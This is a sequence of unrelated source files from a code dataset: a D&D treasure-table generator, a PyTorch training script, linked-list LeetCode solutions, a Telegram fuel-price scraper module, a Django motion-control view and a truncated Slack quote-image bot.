Glaze\n#\n# crCalc_Treasure_Wondrous.py\n\n\nimport crawler\nimport crDice\nimport string\nimport wx\n\n\n#-----------------------------------------------------------------------\n#------ Generate Minor Wondrous Item (Table 7-27, Page 247) ------------\n#-----------------------------------------------------------------------\n\n\ndef GetOneMinorWondrous():\n dct_item = {}\n\n percentage_roll = crDice.RollPercentage()[1]\n\n item_tuple = (\n (\"Quaal's feather token, anchor\", 50),\n (\"universal solvent\", 50),\n (\"elixir of love\", 150),\n (\"unguent 
of timelessness\", 150),\n (\"Quaal's feather token, fan\", 200),\n (\"dust of tracelessness\", 250),\n (\"elixir of hiding\", 250),\n (\"elixir of sneaking\", 250),\n (\"elixir of swimming\", 250),\n (\"elixir of vision\", 250),\n (\"silversheen\", 250),\n (\"Quaal's feather token, bird\", 300),\n (\"Quaal's feather token, tree\", 400),\n (\"Quaal's feather token, swan boat\", 450),\n (\"elixir of truth\", 500),\n (\"Quaal's feather token, whip\", 500),\n (\"dust of dryness\", 850),\n (\"bag of tricks, gray\", 900),\n (\"hand of the mage\", 900),\n (\"bracers of armor +1\", 1000),\n (\"cloak of resistance +1\", 1000),\n (\"pearl of power, 1st-level spell\", 1000),\n (\"phylactery of faithfulness\", 1000),\n (\"salve of slipperiness\", 1000),\n (\"elixir of fire breath\", 1100),\n (\"pipes of the sewers\", 1150),\n (\"dust of illusion\", 1200),\n (\"goggles of minute seeing\", 1250),\n (\"brooch of shielding\", 1500),\n (\"necklace of fireballs type I\", 1650),\n (\"dust of appearance\", 1800),\n (\"hat of disguise\", 1800),\n (\"pipes of sounding\", 1800),\n (\"quiver of Ehlonna\", 1800),\n (\"amulet of natural armor +1\", 2000),\n (\"Heward's handy haversack\", 2000),\n (\"horn of fog\", 2000),\n (\"elemental gem\", 2250),\n (\"robe of bones\", 2400),\n (\"sovereign glue\", 2400),\n (\"bag of holding type I\", 2500),\n (\"boots of elvenkind\", 2500),\n (\"boots of the winterlands\", 2500),\n (\"candle of truth\", 2500),\n (\"cloak of elvenkind\", 2500),\n (\"eyes of the eagle\", 2500),\n (\"scarab, golembane\", 2500),\n (\"necklace of fireballs type II\", 2700),\n (\"stone of alarm\", 2700),\n (\"bag of tricks, rust\", 3000),\n (\"bead of force\", 3000),\n (\"chime of opening\", 3000),\n (\"horseshoes of speed\", 3000),\n (\"rope of climbing\", 3000),\n (\"dust of disappearance\", 3500),\n (\"lens of detection\", 3500),\n (\"vestment, druid's\", 3750),\n (\"figurine of wondrous power, silver raven\", 3800),\n (\"amulet of health +2\", 4000),\n (\"bracers of armor +2\", 4000),\n (\"cloak of charisma +2\", 4000),\n (\"cloak of resistance +2\", 4000),\n (\"gauntlets of ogre power\", 4000),\n (\"gloves of arrow snaring\", 4000),\n (\"gloves of dexterity +2\", 4000),\n (\"headband of intellect +2\", 4000),\n (\"ioun stone, clear spindle\", 4000),\n (\"Keoghtom's ointment\", 4000),\n (\"Nolzur's marvelous pigments\", 4000),\n (\"pearl of power, 2nd-level spell\", 4000),\n (\"periapt of wisdom +2\", 4000),\n (\"stone salve\", 4000),\n (\"necklace of fireballs type III\", 4350),\n (\"circlet of persuasion\", 4500),\n (\"slippers of spider climbing\", 4800),\n (\"incense of meditation\", 4900),\n (\"bag of holding type II\", 5000),\n (\"bracers of archery, lesser\", 5000),\n (\"ioun stone, dusty rose prism\", 5000),\n (\"helm of comprehend languages and read magic\", 5200),\n (\"vest of escape\", 5200),\n (\"eversmoking bottle\", 5400),\n (\"Murlynd's spoon\", 5400),\n (\"necklace of fireballs type IV\", 5400),\n (\"boots of striding and springing\", 5500),\n (\"wind fan\", 5500),\n (\"amulet of mighty fists +1\", 6000),\n (\"horseshoes of a zephyr\", 6000),\n (\"pipes of haunting\", 6000),\n (\"necklace of fireballs type V\", 6150),\n (\"gloves of swimming and climbing\", 6250),\n (\"bag of tricks, tan\", 6300),\n (\"circlet of blasting, minor\", 6480),\n (\"horn of goodness/evil\", 6500),\n (\"robe of useful items\", 7000),\n (\"boat, folding\", 7200),\n (\"cloak of the manta ray\", 7200),\n (\"bottle of air\", 7250),\n (\"bag of holding type III\", 7400),\n (\"periapt of health\", 7400)\n 
)\n\n item_index = (percentage_roll-1)\n\n name = item_tuple[item_index][0]\n base_value = item_tuple[item_index][1]\n\n dct_item[\"name\"] = name\n dct_item[\"value\"] = base_value\n\n return dct_item\n\n\n#-----------------------------------------------------------------------\n#------ Generate Medium Wondrous Item (Table 7-28, Page 249) -----------\n#-----------------------------------------------------------------------\n\n\ndef GetOneMediumWondrous():\n dct_item = {}\n\n percentage_roll = crDice.RollPercentage()[1]\n\n item_tuple = (\n (\"boots of levitation\", 7500),\n (\"harp of charming\", 7500),\n (\"amulet of natural armor +2\", 8000),\n (\"golem manual, flesh\", 8000),\n (\"hand of glory\", 8000),\n (\"ioun stone, deep red sphere\", 8000),\n (\"ioun stone, incandescent blue sphere\", 8000),\n (\"ioun stone, pale blue rhomboid\", 8000),\n (\"ioun stone, pink and green sphere\", 8000),\n (\"ioun stone, pink rhomboid\", 8000),\n (\"ioun stone, scarlet and blue sphere\", 8000),\n (\"deck of illusions\", 8100),\n (\"necklace of fireballs type VI\", 8100),\n (\"candle of invocation\", 8400),\n (\"bracers of armor +3\", 9000),\n (\"cloak of resistance +3\", 9000),\n (\"decanter of endless water\", 9000),\n (\"necklace of adaptation\", 9000),\n (\"pearl of power, 3rd-level spell\", 9000),\n (\"talisman of the sphere\", 9000),\n (\"figurine of wondrous power, serpentine owl\", 9100),\n (\"necklace of fireballs type VII\", 9150),\n (\"strand of prayer beads, lesser\", 9600),\n (\"bag of holding type IV\", 10000),\n (\"figurine of wondrous power, bronze griffon\", 10000),\n (\"figurine of wondrous power, ebony fly\", 10000),\n (\"glove of storing\", 10000),\n (\"ioun stone, dark blue rhomboid\", 10000),\n (\"stone horse, courser\", 10000),\n (\"cape of the mountebank\", 10080),\n (\"phylactery of undead turning\", 11000),\n (\"gauntlet of rust\", 11500),\n (\"boots of speed\", 12000),\n (\"goggles of night\", 12000),\n (\"golem manual, clay\", 12000),\n (\"medallion of thoughts\", 12000),\n (\"pipes of pain\", 12000),\n (\"Boccob's blessed book\", 12500),\n (\"belt, monk's\", 13000),\n (\"gem of brightness\", 13000),\n (\"lyre of building\", 13000),\n (\"cloak of arachnida\", 14000),\n (\"stone horse, destrier\", 14800),\n (\"belt of dwarvenkind\", 14900),\n (\"periapt of wound closure\", 15000),\n (\"horn of the tritons\", 15100),\n (\"pearl of the sirines\", 15300),\n (\"figurine of wondrous power, onyx dog\", 15500),\n (\"amulet of health +4\", 16000),\n (\"belt of giant strength +4\", 16000),\n (\"boots, winged\", 16000),\n (\"bracers of armor +4\", 16000),\n (\"cloak of charisma +4\", 16000),\n (\"cloak of resistance +4\", 16000),\n (\"gloves of dexterity +4\", 16000),\n (\"headband of intellect +4\", 16000),\n (\"pearl of power, 4th-level spell\", 16000),\n (\"periapt of wisdom +4\", 16000),\n (\"scabbard of keen edges\", 16000),\n (\"figurine of wondrous power, golden lions\", 16500),\n (\"chime of interruption\", 16800),\n (\"broom of flying\", 17000),\n (\"figurine of wondrous power, marble elephant\", 17000),\n (\"amulet of natural armor +3\", 18000),\n (\"ioun stone, iridescent spindle\", 18000),\n (\"bracelet of friends\", 19000),\n (\"carpet of flying, 5 ft. 
by 5 ft.\", 20000),\n (\"horn of blasting\", 20000),\n (\"ioun stone, pale lavender ellipsoid\", 20000),\n (\"ioun stone, pearly white spindle\", 20000),\n (\"portable hole\", 20000),\n (\"stone of good luck (luckstone)\", 20000),\n (\"figurine of wondrous power, ivory goats\", 21000),\n (\"rope of entanglement\", 21000),\n (\"golem manual, stone\", 22000),\n (\"mask of the skull\", 22000),\n (\"mattock of the titans\", 23348),\n (\"circlet of blasting, major\", 23760),\n (\"amulet of mighty fists +2\", 24000),\n (\"cloak of displacement, minor\", 24000),\n (\"helm of underwater action\", 24000),\n (\"bracers of archery, greater\", 25000),\n (\"bracers of armor +5\", 25000),\n (\"cloak of resistance +5\", 25000),\n (\"eyes of doom\", 25000),\n (\"pearl of power, 5th-level spell\", 25000),\n (\"maul of the titans\", 25305),\n (\"strand of prayer beads\", 25800),\n (\"cloak of the bat\", 26000),\n (\"iron bands of Bilarro\", 26000),\n (\"cube of frost resistance\", 27000),\n (\"helm of telepathy\", 27000),\n (\"periapt of proof against poison\", 27000),\n (\"robe of scintillating colors\", 27000),\n (\"manual of bodily health +1\", 27500),\n (\"manual of gainful exercise +1\", 27500),\n (\"manual of quickness in action +1\", 27500),\n (\"tome of clear thought +1\", 27500),\n (\"tome of leadership and influence +1\", 27500),\n (\"tome of understanding +1\", 27500)\n )\n\n item_index = (percentage_roll-1)\n\n name = item_tuple[item_index][0]\n base_value = item_tuple[item_index][1]\n\n dct_item[\"name\"] = name\n dct_item[\"value\"] = base_value\n\n return dct_item\n\n\n#-----------------------------------------------------------------------\n#------ Generate Major Wondrous Item (Table 7-29, Page 251) ------------\n#-----------------------------------------------------------------------\n\n\ndef GetOneMajorWondrous():\n dct_item = {}\n\n percentage_roll = crDice.RollPercentage()[1]\n\n item_tuple = (\n (\"dimensional shackles\", 28000),\n (\"figurine of wondrous power, obsidian steed\", 28500),\n (\"drums of panic\", 30000),\n (\"ioun stone, orange\", 30000),\n (\"ioun stone, pale green prism\", 30000),\n (\"lantern of revealing\", 30000),\n (\"robe of blending\", 30000),\n (\"amulet of natural armor +4\", 32000),\n (\"amulet of proof against detection and location\", 35000),\n (\"carpet of flying, 5 ft. by 10 ft.\", 35000),\n (\"golem manual, iron\", 35000),\n (\"amulet of health +6\", 36000),\n (\"belt of giant strength +6\", 36000),\n (\"bracers of armor +6\", 36000),\n (\"cloak of charisma +6\", 36000),\n (\"gloves of dexterity +6\", 36000),\n (\"headband of intellect +6\", 36000),\n (\"ioun stone, vibrant purple prism\", 36000),\n (\"pearl of power, 6th-level spell\", 36000),\n (\"periapt of wisdom +6\", 36000),\n (\"scarab of protection\", 38000),\n (\"ioun stone, lavender and green ellipsoid\", 40000),\n (\"ring gates\", 40000),\n (\"crystal ball\", 42000),\n (\"golem manual, greater stone\", 44000),\n (\"orb of storms\", 48000),\n (\"boots of teleportation\", 49000),\n (\"bracers of armor +7\", 49000),\n (\"pearl of power, 7th-level spell\", 49000),\n (\"amulet of natural armor +5\", 50000),\n (\"cloak of displacement, major\", 50000),\n (\"crystal ball with see invisibility\", 50000),\n (\"horn of Valhalla\", 50000),\n (\"crystal ball with detect thoughts\", 51000),\n (\"carpet of flying, 6 ft. 
by 9 ft.\", 53000),\n (\"amulet of mighty fists +3\", 54000),\n (\"wings of flying\", 54000),\n (\"cloak of etherealness\", 55000),\n (\"Daern's instant fortress\", 55000),\n (\"manual of bodily health +2\", 55000),\n (\"manual of gainful exercise +2\", 55000),\n (\"manual of quickness in action +2\", 55000),\n (\"tome of clear thought +2\", 55000),\n (\"tome of leadership and influence +2\", 55000),\n (\"tome of understanding +2\", 55000),\n (\"eyes of charming\", 56000),\n (\"robe of stars\", 58000),\n (\"carpet of flying, 10 ft. by 10 ft.\", 60000),\n (\"darkskull\", 60000),\n (\"cube of force\", 62000),\n (\"bracers of armor +8\", 64000),\n (\"pearl of power, 8th-level spell\", 64000),\n (\"crystal ball with telepathy\", 70000),\n (\"horn of blasting, greater\", 70000),\n (\"pearl of power, two spells\", 70000),\n (\"helm of teleportation\", 73500),\n (\"gem of seeing\", 75000),\n (\"robe of the archmagi\", 75000),\n (\"mantle of faith\", 76000),\n (\"crystal ball with true seeing\", 80000),\n (\"pearl of power, 9th-level spell\", 81000),\n (\"well of many worlds\", 82000),\n (\"manual of bodily health +3\", 82500),\n (\"manual of gainful exercise +3\", 82500),\n (\"manual of quickness in action +3\", 82500),\n (\"tome of clear thought +3\", 82500),\n (\"tome of leadership and influence +3\", 82500),\n (\"tome of understanding +3\", 82500),\n (\"apparatus of Kwalish\", 90000),\n (\"mantle of spell resistance\", 90000),\n (\"mirror of opposition\", 92000),\n (\"strand of prayer beads, greater\", 95800),\n (\"amulet of mighty fists +4\", 96000),\n (\"eyes of petrification\", 98000),\n (\"bowl of commanding water elementals\", 100000),\n (\"brazier of commanding fire elementals\", 100000),\n (\"censer of controlling air elementals\", 100000),\n (\"stone of controlling earth elementals\", 100000),\n (\"manual of bodily health +4\", 110000),\n (\"manual of gainful exercise +4\", 110000),\n (\"manual of quickness in action +4\", 110000),\n (\"tome of clear thought +4\", 110000),\n (\"tome of leadership and influence +4\", 110000),\n (\"tome of understanding +4\", 110000),\n (\"amulet of the planes\", 120000),\n (\"robe of eyes\", 120000),\n (\"helm of brilliance\", 125000),\n (\"manual of bodily health +5\", 137500),\n (\"manual of gainful exercise +5\", 137500),\n (\"manual of quickness in action +5\", 137500),\n (\"tome of clear thought +5\", 137500),\n (\"tome of leadership and influence +5\", 137500),\n (\"tome of understanding +5\", 137500),\n (\"efreeti bottle\", 145000),\n (\"amulet of mighty fists +5\", 150000),\n (\"chaos diamond\", 160000),\n (\"cubic gate\", 164000),\n (\"iron flask\", 170000),\n (\"mirror of mental prowess\", 175000),\n (\"mirror of life trapping\", 200000)\n )\n\n item_index = (percentage_roll-1)\n\n name = item_tuple[item_index][0]\n base_value = item_tuple[item_index][1]\n\n dct_item[\"name\"] = name\n dct_item[\"value\"] = base_value\n\n return dct_item\n\n\n#-----------------------------------------------------------------------\n#------ Generate One Random Wondrous Item ------------------------------\n#-----------------------------------------------------------------------\n\n\ndef GetOneWondrous(m_type):\n minor = False\n medium = False\n major = False\n\n if string.upper(m_type) == \"MINOR\": minor = True\n elif string.upper(m_type) == \"MEDIUM\": medium = True\n elif string.upper(m_type) == \"MAJOR\": major = True\n\n if minor:\n return GetOneMinorWondrous()\n elif medium:\n return GetOneMediumWondrous()\n elif major:\n return 
GetOneMajorWondrous()\n\n\n#***********************************************************************\n\n\nif __name__ == \"__main__\":\n crawler.Main()\n","repo_name":"bglaze/crawler-python","sub_path":"crCalc_Treasure_Wondrous.py","file_name":"crCalc_Treasure_Wondrous.py","file_ext":"py","file_size_in_byte":14488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"26981381829","text":"import torch as t\nfrom data import ChallengeDataset\nfrom torch.utils.data import WeightedRandomSampler\nfrom trainer import Trainer\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport model\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport os\nimport random\nimport math\nfrom Sampler import CustomSampler\n\ndef data_split(dataset):\n datalist = dataset.values.tolist()\n c00 = 0\n c01 = 0\n c10 = 0\n c11 = 0\n list00 = []\n list01 = []\n list10 = []\n list11 = []\n\n for data in datalist:\n crack = data[1]\n inact = data[2]\n\n if crack == 0 and inact == 0:\n c00 += 1\n list00.append(data)\n elif crack == 1 and inact == 0:\n c10 += 1\n list10.append(data)\n elif crack == 0 and inact == 1:\n c01 += 1\n list01.append(data)\n else:\n c11 += 1\n list11.append(data)\n\n random.shuffle(list00)\n random.shuffle(list01)\n random.shuffle(list10)\n random.shuffle(list11)\n\n trainnum00 = 0\n trainnum01 = 0\n trainnum10 = 0\n trainnum11 = 0\n\n idx00 = int(round(c00 * 0.75))\n idx01 = int(round(c01 * 0.8))\n idx10 = int(round(c10 * 0.75))\n idx11 = int(round(c11 * 0.8))\n\n testnum00 = idx00\n testnum01 = idx01\n testnum10 = idx10\n testnum11 = idx11\n\n for i in range(1):\n trainlist = list00[:idx00]\n trainnum00 += idx00\n for i in range(1):\n trainlist += list01[:idx01]\n trainnum01 += idx01\n for i in range(1):\n trainlist += list10[:idx10]\n trainnum10 += idx10\n for i in range(1):\n trainlist += list11[:idx11]\n trainnum11 += idx11\n\n testlist = list00[testnum00:]\n testlist += list01[testnum01:]\n testlist += list10[testnum10:]\n testlist += list11[testnum11:]\n\n random.shuffle(trainlist)\n random.shuffle(testlist)\n\n train = pd.DataFrame(trainlist,columns = ['filename', 'crack', 'inactive'])\n test = pd.DataFrame(testlist,columns = ['filename', 'crack', 'inactive'])\n\n print(f\"trainnum00:: {trainnum00}, trainnum01:: {trainnum01}\")\n print(f\"trainnum10:: {trainnum10}, trainnum11:: {trainnum11}\")\n\n q00 = np.ones((trainnum00,2),dtype=int)\n q01 = np.ones((trainnum01,2),dtype=int)\n q10 = np.ones((trainnum10,2),dtype=int)\n q11 = np.ones((trainnum11,2),dtype=int)\n qidx = [0, 0, 0, 0]\n idx = 0\n for data in trainlist:\n if data[1]==0 and data[2]==0:\n q00[qidx[0],1] = int(idx)\n qidx[0] += 1\n elif data[1]==0 and data[2]==1:\n q01[qidx[1],1] = int(idx)\n qidx[1] += 1\n elif data[1]==1 and data[2]==0:\n q10[qidx[2],1] = int(idx)\n qidx[2] += 1\n elif data[1]==1 and data[2]==1:\n q11[qidx[3],1] = int(idx)\n qidx[3] += 1\n idx += 1\n\n qs = [q00, q01, q10, q11]\n ct = [trainnum00, trainnum01, trainnum10, trainnum11]\n\n return train, test, qs, ct\n\ndata = pd.read_csv('./data.csv', sep=';')\n\nres = None\nlearning_rates = [0.0001]\ndropout_rates = [0.5]\nweight_decays = [0.00001]\nmomentums = [0.999]\npatience = [7]\nbatch_size = 32\n\nfor mul in range(100):\n train_data, test_data, qs, ct = data_split(data)\n\n sampler = CustomSampler(qs,(21.5, 0.5, 5.5, 4.5), 'a')\n\n val_dl = t.utils.data.DataLoader(ChallengeDataset(test_data, 'val'), batch_size=batch_size, shuffle = False)\n train_dl = 
t.utils.data.DataLoader(ChallengeDataset(train_data, 'train'), batch_size=batch_size, shuffle = True)\n #train_dl = t.utils.data.DataLoader(ChallengeDataset(train_data, 'train'), batch_size=batch_size, shuffle = False, sampler = sampler)\n\n for patience_i in patience:\n for weight_decay in weight_decays:\n for dropout_rate in dropout_rates:\n for learning_rate_i in learning_rates:\n for momentum in momentums:\n #mmodel = model.ResNet()\n #mmodel = model.DenseNet()\n #mmodel = model.ResNext()\n #mmodel = model.WideResNet()\n mmodel = model.CustomModel()\n trainer = Trainer(mmodel,\n t.nn.BCELoss(),\n t.optim.Adam(mmodel.parameters(), lr=learning_rate_i, betas=(0.9, momentum),\n eps=1e-08, weight_decay=weight_decay),\n train_dl,\n val_dl,\n #cuda=True,\n cuda=False,\n early_stopping_patience=patience_i, loss_weight = None)\n\n #if os.path.isfile('checkpoints/checkpoint_{:03d}.ckp'.format(0)):\n ##trainer.restore_checkpoint(0)\n\n print(f\"learning_rate_i:: {learning_rate_i:>7f}\")\n res = trainer.fit()\n print(\"\")\n\n# plot the results\nplt.plot(np.arange(len(res[0])), res[0], label='train loss')\nplt.plot(np.arange(len(res[1])), res[1], label='val loss')\nplt.yscale('log')\nplt.legend()\nplt.savefig('losses.png')\n\ndef test_func():\n test_loss = [0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4, 0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4,\n 0.2, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2]\n train_loss = [0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4, 0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4,\n 0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4]\n epoch_cnt = 19\n return train_loss, test_loss, epoch_cnt - 1\n","repo_name":"lullulalal/StudyAI","sub_path":"DeepLearnigExersice_FAU/exercise4_material/src_to_implement/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42880024304","text":"# method 1: iterative\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n dummy = tail = ListNode(-1)\n dummy.next = l = r = head\n \n while True:\n count = 0\n while count < k and r:\n count += 1\n r = r.next\n \n if count == k:\n prev, cur = r, l\n for _ in range(k):\n tmp = cur.next\n cur.next = prev\n prev = cur\n cur = tmp\n tail.next = prev\n tail = l\n l = r\n else:\n return dummy.next\n\n# method 2: recursion\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n r = head\n cnt = 0\n while r and cnt < k:\n cnt += 1\n r = r.next\n \n if k <= 1 or cnt < k:\n return head\n \n if cnt == k:\n prev, cur = None, head\n for _ in range(k):\n nxt = cur.next\n cur.next = prev\n prev = cur\n cur = nxt\n head.next = self.reverseKGroup(cur, k)\n return prev\n \n","repo_name":"MengSunS/daily-leetcode","sub_path":"linked_list/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11158570487","text":"__version__ = (0, 0, 2)\n# module by:\n# █▀ █▄▀ █ █░░ █░░ ▀█\n# ▄█ █░█ █ █▄▄ █▄▄ █▄\n\n# █▀▄▀█ █▀▀ █▀█ █░█░█\n# █░▀░█ ██▄ █▄█ ▀▄▀▄▀\n# you can edit this module\n# 2022\n# 🔒 Licensed under the AGPL-3.0\n# 🌐 
https://www.gnu.org/licenses/agpl-3.0.html\n# meta developer: @smeowcodes\n# requires: requests beautifulsoup4 tabulate lxml\n# scope: inline\n# meta pic: https://siasky.net/XAArZx4f9mnJtcZpS1M8HSmPgK7xDTDC9NGLCwH9k0mJcQ\n# meta banner: https://siasky.net/fAMzBfMaahm2JTF3ULfrNQHu9R_V5MDP9tiZa-nrVPsqMQ\n\nfrom .. import loader, utils\nfrom telethon.tl.types import Message\nimport requests, random\nfrom bs4 import BeautifulSoup\nfrom tabulate import tabulate\nfrom ..inline.types import InlineQuery\n\n\ndef gassearch():\n response = requests.get(\"https://auto.ria.com/uk/toplivo/\")\n soup = BeautifulSoup(response.text, \"lxml\")\n benz = soup.find_all(\"div\", class_=\"t-row\")\n price = []\n names = [\"A-95+ \", \"A-95 \", \"A-92 \", \"ДП \", \"Газ \"]\n for gasoline in benz:\n a = gasoline.find(\"div\", class_=\"t-cell bold size18\")\n if a:\n price.append(a.get_text() + \"₴\")\n data = [list(gas) for gas in zip(names, price)]\n\n return (\n f\"Паливо Ціна/л{tabulate(data, headers=['', ''])}\"\n )\n\n\nclass GasolineUaMod(loader.Module):\n \"\"\"Gasoline price viewer taken from https://auto.ria.com/uk/toplivo/\"\"\"\n\n strings = {\n \"name\": \"GasolineUa\",\n }\n\n async def lincmd(self, message: Message):\n \"See the price of gasoline\"\n m = random.randint(0, 5)\n if m == 4:\n markup = [[{\"text\": \"💞 More modules\", \"url\": \"https://t.me/smeowcodes\"}]]\n else:\n markup = []\n await self.inline.form(\n message=message,\n text=gassearch(),\n reply_markup=markup,\n )\n\n @loader.inline_everyone\n async def lin_inline_handler(self, query: InlineQuery):\n \"lincmd inline version\"\n return {\n \"title\": \"GasolinPrice\",\n \"description\": \"meow\",\n \"message\": gassearch(),\n }","repo_name":"VitalyaNUZP/ftg","sub_path":"GasolineUa.py","file_name":"GasolineUa.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34957786010","text":"from django.shortcuts import render, redirect\nimport ctypes\nfrom .models import Motion_status\nimport time\nfrom . 
import consumer\n\n\n# Create your views here.\naxtdll_1 = ctypes.WinDLL('./AXL.dll')\naxtdll_2 = ctypes.WinDLL('./EzBasicAxl.dll')\n\n#axtdll_1.AxmMotLoadParaAll.argtypes\n# set the parameter and return types for each library function\nAxlOpen = axtdll_1['AxlOpen']\nAxlOpen.argtypes = [ctypes.c_long]\nAxlOpen.restype = ctypes.c_ulong\nAxmMotLoadParaAll = axtdll_1['AxmMotLoadParaAll']\nAxmMotLoadParaAll.argtypes = [ctypes.c_char_p]\nAxmMotLoadParaAll.restype = ctypes.c_ulong\nAxmSignalServoOn = axtdll_1['AxmSignalServoOn']\nAxmSignalServoOn.argtypes = [ctypes.c_long, ctypes.c_ulong]\nAxmSignalServoOn.restype = ctypes.c_ulong\nAxmMoveVel = axtdll_1['AxmMoveVel']\nAxmMoveVel.argtypes = [ctypes.c_long, ctypes.c_double, ctypes.c_double, ctypes.c_double]\nAxmMoveVel.restype = ctypes.c_ulong\nAxmMoveEStop = axtdll_1['AxmMoveEStop']\nAxmMoveEStop.argtypes = [ctypes.c_long]\nAxmMoveEStop.restype = ctypes.c_ulong\nAxmStatusGetCmdPos = axtdll_1['AxmStatusGetCmdPos']\nAxmStatusGetCmdPos.argtypes = [ctypes.c_long, ctypes.POINTER(ctypes.c_double)]\nAxmStatusGetCmdPos.restype = ctypes.c_ulong\nAxmStatusGetActPos = axtdll_1['AxmStatusGetActPos']\nAxmStatusGetActPos.argtypes = [ctypes.c_long, ctypes.POINTER(ctypes.c_double)]\nAxmStatusGetActPos.restype = ctypes.c_ulong\nAxmStatusReadVel = axtdll_1['AxmStatusReadVel']\nAxmStatusReadVel.argtypes = [ctypes.c_long, ctypes.POINTER(ctypes.c_double)]\nAxmStatusReadVel.restype = ctypes.c_ulong\nAXT_RT_SUCCESS = 0\nstat = 0\nAxlOpen(7)\nAxmMotLoadParaAll(b'MotionDefault_1.mot')\nc_cPosition = ctypes.c_double(0)\nc_aPosition = ctypes.c_double(0)\nc_dVel = ctypes.c_double(0)\n\ndef index(request):\n    global stat\n    stat = 0\n    return render(request, 'ctrl/view_1.html')\n\ndef content(request):\n    global selected_axis\n    global velo\n    global accel\n    working = ''\n    if stat == 0:\n        selected_axis = request.POST.get('axisnum')\n        velo = request.POST.get('vel')\n        accel = request.POST.get('accel')\n        # global selected_axis = int(selected_axis_str)\n        AxmSignalServoOn(int(selected_axis), True)\n        #message.submit('servo on')\n        working = 'servo on'\n    context = {'status': working, 'axis': selected_axis, 'accel': accel}\n    return render(request, 'ctrl/view_2.html', context)\n\ndef motOff(request):\n    AxmSignalServoOn(int(selected_axis), False)\n    return redirect('AXTctrl:index')\n\ndef movEstop():\n    AxmMoveEStop(int(selected_axis))\n\ndef movVel():\n    AxmMoveVel(int(selected_axis), int(velo), int(accel), int(accel))\n\n    #consumer.ChatConsumer().submit(message)\n\ndef re_status():\n    AxmStatusGetCmdPos(int(selected_axis), ctypes.byref(c_cPosition))\n    AxmStatusGetActPos(int(selected_axis), ctypes.byref(c_aPosition))\n    AxmStatusReadVel(int(selected_axis), ctypes.byref(c_dVel))\n    cPosition = c_cPosition.value\n    aPosition = c_aPosition.value\n    dVel = c_dVel.value\n    return cPosition, aPosition, dVel\n\n'''\ndef store_status(request, text_data):\n    #status = Motion_status.objects.get(id=1)\n    cPosition = None\n    aPosition = None\n    dVel = None\n    status = None\n    AxmStatusGetCmdPos(int(selected_axis), ctypes.byref(cPosition))\n    AxmStatusGetActPos(int(selected_axis), ctypes.byref(aPosition))\n    AxmStatusReadVel(int(selected_axis), ctypes.byref(dVel))\n    i = 0\n    if i == 0:\n        status = Motion_status(cmdPos=cPosition, actPos=aPosition, cmdVel=dVel)\n        status.save()\n    else:\n        status.cmdPos = cPosition\n        status.actPos = aPosition\n        status.cmdVel = dVel\n        status.save()\n    text_data = Motion_status.objects.get(id=1)\n    context = {'text_data': 
text_data}\n'''\n\n\n\n\n\n","repo_name":"wonjunJ/AXT_webCtrl","sub_path":"AXTproject/AXTctrl/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"7175915123","text":"import datetime\nimport logging\nimport sys\nfrom io import BytesIO\nfrom typing import Optional\nfrom urllib.parse import quote_plus\n\nfrom quotes_slackbot.config import config\nfrom quotes_slackbot.image.assemble import assemble_image_and_text\nfrom quotes_slackbot.ml.glide import run_for_prompt\nfrom quotes_slackbot.ml.gpt3 import query_gpt3\nfrom quotes_slackbot.slack.slack_client import (SingleMessageSlackClient,\n slack_markdown_block)\n\nlogger = logging.getLogger(__name__)\n\n\ndef run(quote: Optional[str] = None, motive: Optional[str] = None):\n dt_start = datetime.datetime.now()\n\n logger.info(f\"Slack channel ID: {config.channel_id}\")\n\n slack = SingleMessageSlackClient(\n token=config.slack_token,\n channel_id=config.channel_id,\n )\n\n if config.send_post_preview:\n slack.put(\n text=config.post_preview,\n blocks=[slack_markdown_block(config.post_text_working)],\n )\n\n try:\n if not quote or not motive:\n motive, quote = fetch_quote_and_motive()\n\n if not quote or not motive:\n logger.error(\"Retries exceeded to obtain quote and motive\")\n return\n\n logger.info(f\"quote: {quote}\")\n logger.info(f\"motive: {motive}\")\n\n image = run_for_prompt(motive)\n\n image_and_quote = assemble_image_and_text(image=image, text=quote)\n\n slack.delete()\n img_byte_arr = BytesIO()\n image_and_quote.save(img_byte_arr, format=\"PNG\")\n img_byte_arr = img_byte_arr.getvalue()\n blocks = [slack_markdown_block(config.post_text_done)]\n slack.put(file_content=img_byte_arr, text=config.post_preview, blocks=blocks)\n\n duration = datetime.datetime.now() - dt_start\n duration_str = (\n f\"{int(duration.total_seconds() // 60)} min \"\n f\"{int(duration.total_seconds()) % 60} s\"\n )\n escaped_query = quote_plus(f'\"{quote}\"')\n url = \"https://www.google.com/search?q=\" + escaped_query\n details_post = \"\\n\".join(\n [\n \"_Quote and image have been generated by neural networks_ \",\n \"\",\n f\"*Image theme*: {motive}\",\n \"\",\n f\"*Text quote*: {quote}\",\n \"\",\n f\"*Generation time*: {duration_str}\",\n \"\",\n f\"*Who said 